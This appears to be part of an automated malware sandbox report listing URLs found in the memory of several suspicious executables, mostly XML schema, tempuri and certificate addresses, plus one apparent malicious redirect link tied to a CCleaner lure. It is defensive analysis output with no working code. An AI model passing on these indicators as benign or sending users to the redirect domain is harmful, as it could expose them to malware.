                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/:hardwares.
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.000000000334C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.000000000334C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                      Source: be08f59021.exe, 00000016.00000003.3054113358.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.3054373991.000000000565C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                      Source: firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                      Source: dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cVN
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-update
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/DownloadIntegrat
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2414367084.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2446328037.0000024335687000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437020249.000002433567D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2436946866.000002433759C000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437383354.0000024335685000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
                      Source: F0A3.tmp.ctx.exe, 00000027.00000003.2436286766.0000024335698000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2457958774.00000243374C0000.00000004.00001000.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2436213951.0000024337581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
                      Source: firefox.exe, 0000002C.00000003.2501375547.00000144ACC77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/importCustomElementFromESModule
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: AzVRM7c.exe, 0000000B.00000003.2097063443.000002E277414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                      Source: AzVRM7c.exe, 0000000B.00000003.2097063443.000002E277414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                      Source: explorer.exe, 00000014.00000003.3077732141.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3074284180.000000000D532000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
